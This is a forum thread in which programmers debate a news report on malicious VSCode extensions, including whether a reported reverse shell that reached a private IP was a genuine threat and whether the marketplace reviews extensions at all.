Malicious VSCode extensions with millions of installs discovered

floofloof@lemmy.ca to Programming@programming.dev – 234 points –
Malicious VSCode extensions with millions of installs discovered
bleepingcomputer.com
53

You are viewing a single comment

Their findings included an extension that opens an obvious reverse shell.

They made themselves the extensions.
If you are talking about the other reverse shell, it hit a local IP address.

True, it’s a private (not local) IP. It could easily have connected to a remote system, as their proof-of-concept did.

This code execs cmd.exe and pipes output to and from a hardcoded IP. That’s pretty weird. What’s running on that IP? How does the extension know something is there?

It looks like VS Code has no review — human or automated — or enforced entitlement system that would have stopped this or at least had someone verify it was legit.

Thing is, tons of code extensions have an RCE in one form or another, but they always hit a localhost, or configurable IP. How do there automated analysis did any difference ?
Tons of extensions summon the cmd to summon the language devtools, their automated analysis flagged tons of package and they infer millions of infeections from that.

infeections

Since I read this I can't stop picturing you as Peter Lorre lmao.

Damn now I noticed i did tons of mistake/types there ^^'.